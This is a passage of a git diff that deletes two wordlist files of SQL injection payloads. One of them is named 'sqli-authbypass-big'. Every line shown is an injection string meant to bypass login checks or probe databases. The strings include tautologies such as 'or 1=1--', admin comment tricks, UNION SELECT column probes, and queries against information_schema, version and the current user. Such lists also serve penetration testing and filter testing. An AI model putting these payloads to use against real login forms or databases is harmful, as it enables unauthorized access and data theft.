-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
